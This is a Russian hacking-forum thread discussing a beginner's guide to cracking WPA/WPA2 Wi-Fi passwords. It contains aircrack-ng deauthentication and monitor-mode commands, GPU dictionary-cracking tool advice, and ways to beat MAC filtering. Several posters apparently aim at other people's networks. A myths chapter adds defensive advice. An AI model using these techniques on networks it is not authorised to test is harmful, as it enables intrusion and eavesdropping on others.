cmd5.ru может мне помочь?

Вдумчиво прочитал от А до Я, жду продолжения.
Существует ли софт под windows для перебора с помощью GPU?


Существует - Elcomsoft EWSA. Но ввиду отсутствия у автора сейчас этого самого EWSA и опыта работы с ним (ввиду наличия бесплатных альтернатив в виде того же pyrit) согласен, эта тема на данный момент как-то осталась нераскрытой. Доработаем, спасибо за замечание

cmd5.ru может мне помочь?


Не уверен, в перечне алгоритмов на сайте про WPA ничего не сказано.

очень интересная статья, был бы wi-fi адаптер с радостью попробовал бы, так что пошел искать его)))

кстати хорошо будет если кто подкинет онлайн сервис по бруту wpa ключей.

Предлагаю чтобы не захламлять ветку технические вопросы по тематике статьи вести в тематическом подфоруме вот в этом топике (https://antichat.live/threads/309026/).

Еще у нас есть тема для мелких вопросов по вардрайвингу (https://antichat.live/threads/48818/), велкам

Еще просьба к модераторам раздела по возможности прилепить главу 4 к основной статье, у меня не получается, движок форума не дает.

Славная статейка получилась. Молодчина, все мануалы собраны вместе, перечитанные, обдуманные, дополненные и адаптированные для "чайников". Единственное, что хотелось бы подправить, это команды в Linux BT, и первое, о чем скажу, это перевод адаптера в режим мониторинга эфира - это предпочтительно делать не посредством iwconfig, а программкой из пакета aircrack к-рая называется airmon-ng: airmon-nhg start wlan0, в системе появится новый интерфейс mon0 а wlan0 так и продолжит работать, вплоть до того, что mon0 будет натравлен на таргет сеть, а wlan0 может продолжать работу, например в домашней сети WLAN. Еще один момент - если запустить aireplay-ng без параметров, то можно увидеть справку по доступным ключам, а там хорошо видно, что команда --deauth заменяется -0, что для чайника, не привыкшего работать в консоли удобнее (меньше печатать с клавы - меньше синтаксических ошибок), собственно, она одна нам и нужна. Не лишним так же было бы сказать, что чтобы протестировать сеть и адаптер на возможность инжекции пакетов используется aireplay-ng с параметром -9, т.е., aireplay-ng -9 mon0.

Далее идем. iwconfig отображает имеющиеся в системе беспроводные интерфейсы, но не показывает их МАС адреса, в ситуации с двумя и более картами, трудно сообразить (чайнику особенно) где какая карточка, на помощь приходит команда ifconfig, но иногда ВТ запускается с неподнятыми интерфейсами сети. Тогда ifconfig ничего не выведет на экран, в этом случае можно дать команду ifconfig -a , где ключ -а который заставляет ifconfig показать все имеющиеся в системе адаптеры (проводные и беспроводные) независимо от их состояния и их МАС адреса, а адреса нам нужны, чтобы ориентироваться в своем железе, в конце концов мы работаем с лив-дистрибутива и настройки сбиваются при очередной перезагрузке. Это плохо.

Есть способ сохранять параметры, но об этом детальнее могу сказать в случае необходимости.

Существует - Elcomsoft EWSA. Но ввиду отсутствия у автора сейчас этого самого EWSA и опыта работы с ним (ввиду наличия бесплатных альтернатив в виде того же pyrit) согласен, эта тема на данный момент как-то осталась нераскрытой. Доработаем, спасибо за замечание


По поводу софта под Windows могу порекомендовать Hashcat.

Сайт: http://hashcat.net/oclhashcat-plus/, преимуществ существенных два: скорость перебора превышает EWSA в два раза и она абсолютно бесплатна, там же есть ГУИ: http://hashcat.net/hashcat-gui/, там все предельно ясно, но с одним НО - файл .cap нужно конвертировать в hccap, это можно проделать на самом сайте - http://hashcat.net/cap2hccap/

Предлагаю чтобы не захламлять ветку технические вопросы по тематике статьи вести в тематическом подфоруме
вот в этом топике (https://antichat.live/threads/309026/)
.
Еще у нас есть
тема для мелких вопросов по вардрайвингу (https://antichat.live/threads/48818/)
, велкам
Еще просьба к модераторам раздела по возможности прилепить главу 4 к основной статье, у меня не получается, движок форума не дает.


Прошу прощения не прочел, просьба админам перенести мой пост с замечаниями в соответсвующую ветку

Единственное, что хотелось бы подправить, это команды в Linux BT, и первое, о чем скажу, это перевод адаптера в режим мониторинга эфира - это предпочтительно делать не посредством iwconfig, а программкой из пакета aircrack к-рая называется airmon-ng...


С замечаниями согласен, про airmon-ng хотел и сам дописать (кстати это скрипт который в результате все равно вызывает iwconfig $iface mode monitor )

к сожалению движок форума почему-то не дает мне вносить правки в первый пост так что устранить пока не получается

Чтобы настройки не слетали надо делать флешку с Persistent разделом, очень удобно.

ТС, предлагаю добавить обзор проникновения в сеть при условии фильтра MAC адресов на точке. На практике еще не пробовал, но по логике вещей это вполне осуществимо. Какие есть идеи на этот счет?

ТС, предлагаю добавить обзор проникновения в сеть при условии фильтра MAC адресов на точке. На практике еще не пробовал, но по логике вещей это вполне осуществимо. Какие есть идеи на этот счет?


Про безпалевное подключение как раз планируется написать в главе пятой. В том числе и про фильтрацию MAC-адресов. Идеи? Ну кроме как поставить себе один из разрешенных на точке MAC-адресов и ждать пока хозяин освободит кормушку ничего больше в голову не приходит. Ну можно еще попытаться применить дефолтный пароль к админке роутера или соснифать пароль в случае Http-basic аутентификации в админке и потом добавить еще один мак-адресок в таблицу роутера, но это уже точно не для чайников )))

Да мне кажется статейка уже с самого начала вышла за пределы рядовых чайников. Темы затронуты весьма серьезные, и доходы от целевого использования таких знаний могут быть не малыми. По сути подбор ключа сети аналогичен возможности вставить Ethernet шнурок в чужой сервер.

добавлено в КАРТУ РАЗДЕЛА WI-FI (https://antichat.live/showthread.php/p/814703/)

Немного дополнил Главу 4 (описание программ для перебора с использованием GPU под Windows).



Глава 5. Подключаемся!

[ её еще предстоит написать ]

Глава 6. Основные мифы и заблуждения пользователей Wi-Fi

Заблуждение первое - “А зачем ставить пароль на вай-фай, у меня все равно безлимит, пусть люди пользуются.”

Только не забывайте что в открытой сети весь ваш трафик виден снаружи (включая всякие интересные моменты ), кроме того вы можете потом устать давать показания людям в погонах, когда кто-нибудь что-нибудь напишет, да еще и с вашего IP. Надеюсь, этих причин уже вполне достаточно чтобы поставить пароль на свой Wi-Fi.

Заблуждение второе - “Я использую WPA2, его не взломать”.

Этот вопрос мы уже обсуждали в гл.2, но не лишним будет повторить еще раз. WPA-PSK и WPA2-PSK имеют одинаковые алгоритмы аутентификации, различие только в том что в WPA2 реализован более надежный алгоритм шифрования трафика CCMP вместо проблемного TKIP. Поэтому и взламывается пароль одинаково что для WPA-PSK, что и для WPA2-PSK. Так что если вы не хотите чтобы вас взломали - используйте WPA2, отключите WPS, вложите всю свою фантазию в длинный случайный пароль или настраивайте сервер RADIUS. Точка.

Заблуждение третье - “Я настроил фильтр по мак-адресу на роутере, теперь к нему никто не сможет подключиться кроме меня”.

Да, только не забывайте что ваш MAC-адрес светится в каждом переданном вами пакете и, соответственно, виден снифферу. И ничто не помешает злоумышленнику назначить своему адаптеру ваш MAC-адрес, дождаться пока вы покинете сеть и подключиться (при условии что пароль он уже вычислил заранее). Кроме того, возможен и более извращенный способ, он может подслушать сессию вашей HTTP basic-авторизации когда вы входите в админку вашего роутера (а пароль к админке при этом передается простым текстом без шифрования), и просто добавить потом еще пару MAС-адресов в таблицу разрешенных

Заблуждение четвертое - “А я спрятал свою сеть отключив SSID Broadcast в настройках роутера, теперь точно не взломаете, вы же не знаете названия моей сети”.

Этот способ (а именно отключение передачи роутером широковещательных Beacon frames с рекламой возможностей вашей беспроводной сети) был бы просто идеальной защитой (напомню, в WPA ESSID сети наравне с паролем участвует в процедуре хеширования, и спрятав ESSID вы бы обезоружили взломщика), если бы не одно ”но”. Для лучшего понимания этого “но” давайте на реальном примере настроим “спрятанную” сеть на роутере (назовем ее MyHiddenNetwork для примера) и подключимся к ней. Для подключения к “спрятанной” беспроводной сети в Windows нужно создать ее профиль, где придется указать все ее параметры - название сети, тип безопасности, пароль. Стоп, а что за странная приписка на скриншоте внизу?

http://i056.radikal.ru/1112/72/27ab0ebdcef0.jpg (http://www.radikal.ru)

Теперь давайте подключимся к нашей “спрятанной” сети и посмотрим что при этом происходит в эфире:

http://s001.radikal.ru/i194/1112/2a/4bf1e7e28e3a.jpg (http://www.radikal.ru)

Интересно, да? Клиент пытается найти роутер используя его так надежно “спрятанный” ESSID с помощью Probe request, и тот отвечает взаимностью! Мало того, что ESSID виден как на ладони, к тому же где бы вы не находились, ваш ноутбук будет постоянно долбить Probe request-ы в эфир, рассказывая всем вокруг, что вы являетесь счастливым обладателем подключения к “спрятанной” сети MyHiddenNetwork. Вот такая вот безопасность, бро.

Заблуждение пятое -“Скоро у меня докачаются WPA Rainbow Tables 34Gb и я взломаю любой WPA без всяких GPU”.

Радужные таблицы (Rainbow Tables) - это не новый способ взлома и не замена GPU. Радужные таблицы всего лишь позволяют сэкономить немного времени и электричества за счет записи результатов расчета сверток ESSID+пароль для всех паролей из словаря на жесткий диск в файл или в базу данных. Размерчик такого файла (при соответствующем словаре) получается довольно приличный, а генерировать его надо для каждого ESSID-а свой. Поэтому применение радужных таблиц имеет смысл только при конвеерной обработке хендшейков, да и то только для первой десятки, сотни, тысячи популярных ESSID-ов (нужное подчеркнуть в зависимости от объема ваших дисков). Профит от радужных таблиц - в скорости вычислений (раз в десять выше чем считать на GPU). Но пароль все равно должен быть в словаре, никуда от этого не деться.

[ здесь будут еще заблуждения ]

Вместо эпилога


Отвечая на небольшую критику в каментах, хочу признаться, что я не ставил целью своей статьи подготовить из рядового читателя супер-профессионала по взлому беспроводных сетей и тем самым нанести непоправимый ущерб народному хозяйству страны. Те, кому это необходимо, и сами вполне могут найти всю необходимую информацию в интернете. Целью статьи скорее являлось привлечение внимания к общим (хотя и давно известным) проблемам безопасности беспроводных сетей. Пожалуйста используйте полученную информацию только по назначению - для проверки безопасности своих собственных сетей и никак иначе

http://s017.radikal.ru/i432/1112/61/5e6aec9cf2cf.gif (http://www.radikal.ru)

Удачи

про Gerix видно никто не слышал, что есть такое в BT.

в 5 версии изменили его расположение, думаю найдете

про Gerix видно никто не слышал, что есть такое в BT.
в 5 версии изменили его расположение, думаю найдете


руками веселей и интересней это все делать!а софт для лентяев

Задолбало читать статьи и смотреть видео. Ничего не получается.
Плачу 100$ человеку, который меня сам лично на практике
пошагово научит взламывать сети WiFi.
Шифрование WPA/WPA2.
snakem


а я вот этого не понял ! забил его ник в поиск его нету ,

имхо... много глупых вопросов читать фак никто не хочет хотят что б вся инфа сразу упала в голову сама по себе такого не бывает!!!

за страния + новинок не увидел что очень жаль

не получилось ( на 5 ом пунтке загваздка, пакеты не собераются ...

gpuhash, вот это тема!

11 из 10-ти! Качественный, подробный, понятный фак для всех.


а я вот этого не понял ! забил его ник в поиск его нету ,
имхо... много глупых вопросов читать фак никто не хочет хотят что б вся инфа сразу упала в голову сама по себе такого не бывает!!!


теща, это мой ник, просто ты недокопировал его.

Поверь, я не являюсь человеком из числа лентяев, которым лень читать фак. Просто обстоятельства складывались так, что мне нужно было БЫСТРО получить данный навык. Естественно, я перечитал УЙМУ факов и пересмотрел десятки видео на эту тему. Но когда сталкиваешься с проблемой, которая не дает тебе двинуться дальше (при условии, что это было вообще моё ПЕРВОЕ знакомство с линуксоидной средой), да ещё если эта проблема связана с железом или дровами или просто некорректной настройкой, то тут сразу представляется, СКОЛЬКО времени мне предстоит потратить, чтобы всё работало как надо. Копать/Спрашивать/Пробовать...

Поэтому я такое и запостил (про платное обучение). В итоге наткнулся на кидалу (хорошо что не клюнул) и понял, что это тоже не вариант. Поэтому начал сам курить форум и остальное. А gpuhash реально помогал советами и направлял, что где почитать. Если бы не он, я бы до сих пор не освоил бы эту тему. За что ему огромный респект!

Кстати, теща, ты тоже помогал советами в моей темке, за что и тебе большой респект

А данную тему gpuhash оформил более чем! Уж для новичков тут вообще "читай и делай, никуда больше не заглядывая". Отличная работа!

Что то не так!

Отличная статья! Для чайников вроде меня в самый раз. Вопросов почти не остается. Но Elcomsoft Wireless Security Auditor загнало в тупик.

С использованием beside-ng получил WPA-файл с хендшейками трех наиболее сильных сетей в зоне действия ноутбука. Перенес их на более мощный стационарный компьютер с видеокартой Nvidea GeForce GTX 480, и скачал с рекомендуемой ветки форума английский-русский -числовой-символьный словарь. 8,5 Гб.

После запуска атаки по выбранному словарю Elcomsoft Wireless Security Auditor - показал среднюю скорость 24 600, и при работе более часа, в строке состоянии EWSA по прежнему оставалось -0%. Компьютер при этом работал под большой нагрузкой, гудел, греелся. EWSA показывало температуру видеокарты t- 91°.

Можно сделать вывод, что в данных условиях по выбранному словарю атака будет длиться не менее 125 часов, что более пяти суток непрерывной работы компьютера. Можно его угреть насмерть. Да и ждать заветный пароль более пяти суток не камельфо!

http://s56.radikal.ru/i154/1202/bf/94be95cf8e87.jpg

Прошел 1 час 15 минут работы EWSA – по прежнему процесс - 0%, но программа сама остановилась - с сообщением, что пароль не найден и предложила поменять словарь и мутации пароля. В общем словарь был использован не в полном объеме.

Разве это нормально? Что не так?

Может в настройках EWSA что-то не так указал? Делал все в соответствии с рекомендациями в данной теме.

Какие есть методы более быстрой и эффективной атаки по словарю не указанные в данной теме?

Подкиньте информации, желательно подробной (с азами для чайников).

английский-русский -числовой-символьный словарь. 8,5 Гб.
После запуска атаки по выбранному словарю Elcomsoft Wireless Security Auditor - показал среднюю скорость 24 600, и при работе более часа, в строке состоянии EWSA по прежнему оставалось -0%. Компьютер при этом работал под большой нагрузкой, гудел, греелся. EWSA показывало температуру видеокарты t- 91°.
Можно сделать вывод, что в данных условиях по выбранному словарю атака будет длиться не менее 125 часов, что более пяти суток непрерывной работы компьютера. Можно его угреть насмерть. Да и ждать заветный пароль более пяти суток не камельфо!


Отключите мутации в настройках EWSA.

Арифметика должна соблюдаться - 8,5 Гб это примерно 850*10^6 паролей (беру среднюю длину пароля 9 символов + конец строки), при скорости примерно 25000 перебор должен занять 850*10^6/(25000*3600) = ~9,5 часов

Когда EWSA начинает мутировать каждое вхождение из словаря N раз, перебор тоже затянется в N раз, вот откуда прогресс 0% и прогноз 122 дня...

С EWSA я не работаю, могу предположить что внезапное окончание перебора может сигнализировать о критическом перегреве GPU, учтите что 91 градус это очень много, рискуете угробить видеокарту.

Примите меры для дополнительной вентиляции системного блока (если за окном прохладно можно например на балкон выставить для эксперимента).

Отключите мутации в настройках EWSA.
Арифметика должна соблюдаться - 8,5 Гб это примерно 850*10^6 паролей (беру среднюю длину пароля 9 символов + конец строки), при скорости примерно 25000 перебор должен занять 850*10^6/(25000*3600) = ~9,5 часов
Когда EWSA начинает мутировать каждое вхождение из словаря N раз, перебор тоже затянется в N раз, вот откуда прогресс 0% и прогноз 122 дня...
С EWSA я не работаю, могу предположить что внезапное окончание перебора может сигнализировать о критическом перегреве GPU, учтите что 91 градус это очень много, рискуете угробить видеокарту.
Примите меры для дополнительной вентиляции системного блока (если за окном прохладно можно например на балкон выставить для эксперимента).


Спасибо!

скажите, а можно ли установить бэктрек на варю и оттуда все это проделывать? я в линуксе полный чайник !!!

upd*извиняюсь, вопрос про варю отпадает! режу на болванку!

Не получилось.

По совету gpuhash отключил мутации в настройках EWSA. При том отключил по всем параметрам.

http://s018.radikal.ru/i524/1202/cf/0af99cb2a2fe.jpg

Подбор пошел веселей, да и нагрузка на комп была меньше. Он не так грелся и гудел, как с включенными по умолчанию мутациями. Атака по выбранному английско-русскому -числовому-символьному словарю размером - 8,5 Гб длилась 8 часов 19 минут. Но пароль на сеть, в выбранном - WPA-файле с хендшейками, в итоге получен не был. Наверное - пароль у пользователя хитрый или словарь не достаточно хорош.

http://s017.radikal.ru/i409/1202/9f/84c45af644d7.jpg

Ну что ж , попробую другую сеть, может к утру EWSA выдаст заветный пароль на другую сеть.

Хорошая тема!

Круть, давно искал ответ, какую прогу использовать для брута)) аиркрак всего 280-350 паролей в секунду перебирает на моем ноуте. Сегодня я поставил BackTrack5 r1 на ноут, мучился с браузером и Flashplayer пробовал запустить аиркрак - так и не смог, строки длинные писать не очень умею на линуксе. В общем респектище топикстартеру офигенный.

всего 280-350 паролей в секунду перебирает на моем ноуте.


Т.к. не разу не брутил ви-фи, не знаю норм это или нет... но... Сколько?! ВСЕГО 280-350 пасов/сек?!

Специалисты по oclHashcat-plus отзовитесь!

Получил хендшейк-файл доступной сети, и для получения пароля, решил как советует автор поста, использовать oclHashcat-plus.

Преобразовал хендшейк-файл.cap в онлайн-конвертере (http://hashcat.net/cap2hccap/) в формат *.hccap. Скачал последнюю версиюhashcat-gui-0.5.0.

Так как у меня установлена ОС Windows 7 -64bit, запустил скаченный файл hashcat-gui64, и настроил в соответствии с указаниями.

http://s40.radikal.ru/i090/1203/9c/2d611c7d51a4.jpg

Но при старте атака по словарю не запускается, выдает чего-то непонятное.

http://s56.radikal.ru/i154/1203/b2/d70750be87f5.jpg

http://s018.radikal.ru/i502/1203/37/1effe23ebe47.jpg

Что не так? В чем ошибка?

Что не так? В чем ошибка?


последняя версия hashcat просит согласиться с пользовательским соглашением, надо ввести YES в ответ.

сделать это надо только один раз при первом запуске, больше мучить не будет.

последняя версия hashcat просит согласиться с пользовательским соглашением, надо ввести YES в ответ.
сделать это надо только один раз при первом запуске, больше мучить не будет.


Оказывается всё просто! Спасибо!

Запустил всё таки oclHashcat-plus. Програма начала подбор по словарю. Выходит видеокарта Nvidea GeForce GTX 480 не очень хороша для данной работы, выдает скорость всего 28 тыс. в секунду. Но все же на 2 тыс. больше чем EWSA.

Вот только через две минуты работы программа остановиласть и выдала ошибку. Я так понял - видеокарта перегрелась.

http://s52.radikal.ru/i136/1203/e0/ea11021a39b0.jpg

И что теперь делать?

1. Настроить нормальное охлаждение в системе.

2. Повысить температурный лимит в хэшкате.

3. Больше не покупать печки.

1. Настроить нормальное охлаждение в системе.
2. Повысить температурный лимит в хэшкате.


Спасибо! Можно подробней по данным пунктам.
Если имеется в виду добавить куллеров, то уже увеличено максимально, и на корпусе, и на дисках и т.д., больше некуда....


3. Больше не покупать печки.


Когда покупал, ката была лучшей, ну и обошлась довольно дорого, лучше тогда ещё не было. Под нагрузкой сильно греется, и энергопотребление большое, системник гудит, но на сегодняшний день пока справляется, ради брута апгрейд делать пока не готов.

Почему-то проблема с запуском. Качнул hashcat-gui-0.5.1, запускаю гуй, пишет: Приложение или библиотека MSVCR100.dll не является образом программы для Windows NT. Качнул эту длл, закинул в папку хашката, в Windows - всё равно то же самое ;( WinXPSP3, Win7SP1.

Ещё вопрос - если у меня не Альфа, а Блювэй (http://deal-extreme.su/shop/detail-44126/ru) такой же мощности, это роли не играет?

Подскажите пожалуйста в чем моя ошибка

http://s019.radikal.ru/i609/1204/03/d6249e51f68d.jpg

Провожу деассоциацию, а клиент не вылетает(

И еще вопросик в мониторинге одного вай фая видно как подключается и отключается клиент, а handshake не ловится, почему?...

Скажите плз я замутил влеху установил прогу загрузил

Поймал хеш нужной мне сетки и запустил команду на все сетки так вот как глянуть логи где могут быть пассы и как выдернуть с флехи этот хеш и сохранился он если я бук вырубил

Друзя здраствуйте, купил Asus wl-167g v3 для взлома wi fi и столкнулся с такой проблемой:

Запускаю ВТ5 делаю airmon-ng а дрейвера и чипсета он не видит, но конект перед етим делаетса.

Я где то читал что для него нужен специальный драйвер, но где его взять и как его поставить? Очень надеюсь на вашу помощ, заранее спосибо

Классная тема будем знать как этим пользоваться, не сочувствую людям с роуторами.

Сколько раз гемороился, с буками это обычно активная дрочка, на стационарках с картами нового поколения все на мази. Но путем проб и ошибок профит процентов под 80%

Правда мутил немного по другому, но смысл тот же.


Друзя здраствуйте, купил Asus wl-167g v3 для взлома wi fi


Спецом чтоб купил? Мог бы взять у кого-нибудь погонять, проверить

Случайно обнаружил что статья полностью дословно сворована вот этим ресурсом (http://r00t.in/showthread.php?t=18154)

Мое сообщение с критикой там потерли. Ну не твари ли.

Andriy (https://antichat.live/member.php/u/139683/), должно быть стыдно.

gpuhash полностью согласен, очень не красиво, причем так тупо копировать. Даже сообщение snakemc скопировано. Хоть подкорректировал бы немного.

А по теме, просто в восторге, довольно поучительна, самое то для начинающих(кем и являюсь). Большой респект автору!!!

Монстр ATI RADEON 6990 - 3000 шейдеров, 165.000 WPA паролей в секунду.


Улыбнуло

Отклик программы 0,02 секунды. Следовательно паролей может быть только 50 в один поток. Потоков редко открывают больше 300. 300 * 50 = 15000. Это при условии, что процессор способен столько обработать, но домашние ПК на это не способны, а покупать мощную станцию не рационально

Улыбнуло
Отклик программы 0,02 секунды. Следовательно паролей может быть только 50 в один поток. Потоков редко открывают больше 300. 300 * 50 = 15000. Это при условии, что процессор способен столько обработать, но домашние ПК на это не способны, а покупать мощную станцию не рационально


Не буду спорить. Просто Ctrl+V.

Speed........: 377.5k c/s Real, 390.4k c/s GPU

Всего две карты на воде и с большим промышленным кондеем. И легко за 400 оверклочится.

А вообще поизучайте OpenCL, CAL++, CUDA.

Глава 5. Подключаемся!

[ её еще предстоит написать ]

Жалко, что нет главы 5.

Улыбнуло
Отклик программы 0,02 секунды. Следовательно паролей может быть только 50 в один поток. Потоков редко открывают больше 300. 300 * 50 = 15000. Это при условии, что процессор способен столько обработать, но домашние ПК на это не способны, а покупать мощную станцию не рационально


Вот к чему мы пришли в итоге...

Подскажите, где должен валяться .сар файл, если я загружаюсь с флешки? Не могу найти его вообще, ни для того чтобы проверить на наличие хендшейков (прямо в БТ) ни чтобы просто переписать для обработки по поиску пароля по главе 4.

Также не вижу besside.log, в котором, по идее есть пароль от взломанной WEP сети.

Делал всё, впервые, по инструкции, и на этом этапе застрял))

Не много юмора....

http://i011.radikal.ru/1207/c1/7fbee127bb27.jpg (http://www.radikal.ru)

Подскажите, где должен валяться .сар файл, если я загружаюсь с флешки? Не могу найти его вообще, ни для того чтобы проверить на наличие хендшейков (прямо в БТ) ни чтобы просто переписать для обработки по поиску пароля по главе 4.
Также не вижу besside.log, в котором, по идее есть пароль от взломанной WEP сети.
Делал всё, впервые, по инструкции, и на этом этапе застрял))


Присоединяюсь к вопросу и можно ли этот файл записать на флешку,чтоб сканировать уже в Windows. Пожалуйста подскажите.

После входа в ВТ под рутом вы попадаете в домашнюю папку /root

Вообще для любого юзера в линуксе домашняя папка доступна по сокращению ~

Поэтому если после загрузки никаких движений по папкам командой cd не делали - вы были в домашней папке и искать файлы нужно именно там.

Даем команду ls ~ и смотрим результат вывода (можно дать ls -l ~ будет более подробно). Копировать файл - cp ~/besside.log /путь_куда_копировать/besside.log

По поводу флешки - она обычно в ВТ примонтируется автоматом при вставке в USB, ищите ярлык на рабочем столе и копируйте файлы туда.

Если не примонтировалось автоматом:

1. Создаем каталог для примонтирования - mkdir /mnt

2. Вставляем флешку и выясняем на какой девайс подключилась флешка (девайс выглядит обычно как /dev/sd??, где первая позиция - буква, вторая - цифра, например /dev/sda1, /dev/sdb2 и т.д.). Для того чтобы выяснить на каком девайсе флешка дайте команду dmesg и поищите там момент подключения флешки - будет видно на каком девайсе она сидит.

3. Монтируем - mount /dev/sdb1 /mnt (я взял /dev/sdb1 для примера, здесь должен стоять девайс из п.2)

4. В /mnt должно появиться содержимое флешки - копируем туда наши файлы

5. Размонтируем - umount /mnt

Все, флешку можно вынимать.

Подскажите в чем проблема

http://s48.radikal.ru/i120/1207/b3/c560bac60dbd.png

Сижу с виртуальной машины (VMware Workstation) на БТ, раньше все нормально искалось, все вай фаи просматривались, а теперь вообще ни один вай фай не просматривается там...

С адаптором все нормально, на виндовсе все видит и нормально подключается...

Ставил заного БТ на виртуальную машину, все так же не идет, не знаю уже из-за чего...(

Сижу с виртуальной машины (VMware Workstation) на БТ


airodump-ng mon0 для начала посмотри, видит ли адаптер хоть что-то. А вообще нафиг эти виртуальные машины не сдались, загрузись с загрузочной флешки, трудно что-ли?

Я понимаю, что засоряю эту тему, прошу прощения, но я восхищён автором этой статьи, так грамотно и понятно всё поднесено, что и я никогда не видавший BT и то за 2 дня освоился.

Огромное http://s017.radikal.ru/i432/1206/43/4bf28e1ded8c.gif от всех новичков автору !!!

airodump-ng mon0 для начала посмотри, видит ли адаптер хоть что-то. А вообще нафиг эти виртуальные машины не сдались, загрузись с загрузочной флешки, трудно что-ли?


airodump-ng mon0 тоже ничего не видит, то есть адаптер не видит сети вообще, раньше было все нормально там, но что то перестал видеть, с адаптером все нормально т.к. на виндовсе все нормально видит и подключается через него.

Раньше грузился с диска, но с виртуальной машины как то проще и сохраняет сессию если нужно, то есть очень удобно.

----

Так и не понял что было, но теперь заработало

Команда > делает всё сама,но вот эта команда:

http://s018.radikal.ru/i503/1207/96/1cd0ab97a6ee.jpg

буквы -a и -с относятся к командам или начало и конец BSSID?

Команда > делает всё сама,но вот эта команда:
http://s018.radikal.ru/i503/1207/96/1cd0ab97a6ee.jpg
буквы -a и -с относятся к командам или начало и конец BSSID?


-a = bssid = MAC-адрес точки доступа

-c = dmac = MAC-адрес Получателя

http://s1.ipicture.ru/uploads/20120729/C5iRX2Ix.jpg

уважаемые форумчане, программа gerix в какой папке директории сохраняет в файловом виде, пароли, cap, хендшейки.

в кого-нибудь получилось?

только wep

Всем привет!

При запуске на работу hashcat столкнулся со следующей проблемой:

http://img16.imageshack.us/img16/6449/123bxj.jpg (http://imageshack.us/photo/my-images/16/123bxj.jpg/)

В чем может быть дело, что за 301 ошибка?

Прочитал с интересом тему и ответы, решил задать вопросы на основе полученной информации.

Получается, что для взлома WPA2 надо "заснять" процесс авторизации, потом начинается процесс подбора пароля (ключа авторизации), причем он идет только по словарю и прям скажем, не слишком быстро. Подбор пароля без словаря даже для 8значного пароля, думаю, будет идти не меньше года.

В итоге - если пароля нет в словаре, то его и не найдут. Без пароля сделать что-либо вообще невозможно.

Я правильно понял или что-то упустил?


Глава 6. Основные мифы и заблуждения пользователей Wi-Fi
Заблуждение четвертое -
“А я спрятал свою сеть отключив SSID Broadcast в настройках роутера, теперь точно не взломаете, вы же не знаете названия моей сети”.
Этот способ (а именно отключение передачи роутером широковещательных Beacon frames с рекламой возможностей вашей беспроводной сети) был бы просто идеальной защитой (напомню, в WPA ESSID сети наравне с паролем участвует в процедуре хеширования, и спрятав ESSID вы бы обезоружили взломщика), если бы не одно ”но”. Для лучшего понимания этого “но” давайте на реальном примере настроим “спрятанную” сеть на роутере (назовем ее MyHiddenNetwork для примера) и подключимся к ней. Для подключения к “спрятанной” беспроводной сети в Windows нужно создать ее профиль, где придется указать все ее параметры - название сети, тип безопасности, пароль. Стоп, а что за странная приписка на скриншоте внизу?
http://i056.radikal.ru/1112/72/27ab0ebdcef0.jpg (http://www.radikal.ru)
Теперь давайте подключимся к нашей “спрятанной” сети и посмотрим что при этом происходит в эфире:
http://s001.radikal.ru/i194/1112/2a/4bf1e7e28e3a.jpg (http://www.radikal.ru)
Интересно, да? Клиент пытается найти роутер используя его так надежно “спрятанный” ESSID с помощью Probe request, и тот отвечает взаимностью! Мало того, что ESSID виден как на ладони, к тому же где бы вы не находились, ваш ноутбук будет постоянно долбить Probe request-ы в эфир, рассказывая всем вокруг, что вы являетесь счастливым обладателем подключения к “спрятанной” сети MyHiddenNetwork. Вот такая вот безопасность, бро.


Я правильно понимаю, что убрав галочку клиент не будет посылать probe request, "засвечивая" имя сети? Или будет посылать в любом случае при авторизации?

Прочитал с интересом тему и ответы, решил задать вопросы на основе полученной информации.
Получается, что для взлома WPA2 надо "заснять" процесс авторизации, потом начинается процесс подбора пароля (ключа авторизации), причем он идет только по словарю и прям скажем, не слишком быстро. Подбор пароля без словаря даже для 8значного пароля, думаю, будет идти не меньше года.
В итоге - если пароля нет в словаре, то его и не найдут. Без пароля сделать что-либо вообще невозможно.
Я правильно понял или что-то упустил?


Совершенно верно. Варианты брут-форса (пока) малореальны - ждать придется годы, десятилетия и так далее в зависимости от перебираемого алфавита и доступной вычислительной мощности. Поэтому пока только по словарю.


Я правильно понимаю, что убрав галочку клиент не будет посылать probe request, "засвечивая" имя сети? Или будет посылать в любом случае при авторизации?


Probe request действительно не будут рассылаться где и кому попало, но при авторизации ESSID все равно передается вашей точкой доступа.

Спасибо за ответы, я примерно так и думал. Но в инете все равно попадаются примеры того, как у людей взламывают WPA2, например (http://habrahabr.ru/post/122553/#comment_4016419):


Вопрос к вам как специалисту, у меня на домашней wifi точке стоял пароль по шаблону BIGab0cde WPA2-PSK, за какое время такой пароль подбирается? Дело в том что точку ломанули и попали в локалку.


Есть еще какие-то хитры способы узнать ключ авторизации?

Есть еще какие-то хитры способы узнать ключ авторизации?


Есть: атака на WPS (https://antichat.live/threads/310835/)

besside-ng

В новой редакции besside-ng нет.

Вместо нее идет easside-ng и wesside-ng

http://www.aircrack-ng.org/doku.php?id=easside-ng

Заблуждение четвертое


Заблуждение четвертое -
“А я спрятал свою сеть отключив SSID Broadcast в настройках роутера, теперь точно не взломаете, вы же не знаете названия моей сети”.
Этот способ (а именно отключение передачи роутером широковещательных Beacon frames с рекламой возможностей вашей беспроводной сети) был бы просто идеальной защитой (напомню, в WPA ESSID сети наравне с паролем участвует в процедуре хеширования, и спрятав ESSID вы бы обезоружили взломщика), если бы не одно ”но”.


Я не понимаю момента, ну вбили мы свои данные, сохранили их , подключаемся ... Но как хакер видит эфир как показано на картинке http://s001.radikal.ru/i194/1112/2a/4bf1e7e28e3a.jpg когда нашей точки не видно при сканирование сетей.. локально что-ли? не могу понять этого. напишите плиз по обширнее , а то не понятно.

Я вообще ничего не понимаю, кто то мне говорил что есть просто софт для подбора числового пароля к фай вай, и не надо выполнять этих всех действий

Я не понимаю момента, ну вбили мы свои данные, сохранили их , подключаемся ... Но как хакер видит эфир как показано на картинке http://s001.radikal.ru/i194/1112/2a/4bf1e7e28e3a.jpg
когда нашей точки не видно при сканирование сетей..
локально что-ли? не могу понять этого. напишите плиз по обширнее , а то не понятно.


При "сканировании" отображаются только те точки доступа, которые рассылают широковещательные beacon frames (даже не знаю как их лучше обозвать по-русски).

Если "скрыть" точку (отключить рассылку beacon frames) то тогда клиент чтобы найти скрытую точку начинает долбить в эфир Probe request. Это, вообще говоря, еще хуже... Хотя при "сканировании" да, точки не видно. А при нормальном дампе эфира - еще как видно.

А при нормальном дампе эфира


все понял кроме этого, опиши подробнее плиз

все понял кроме этого, опиши подробнее плиз


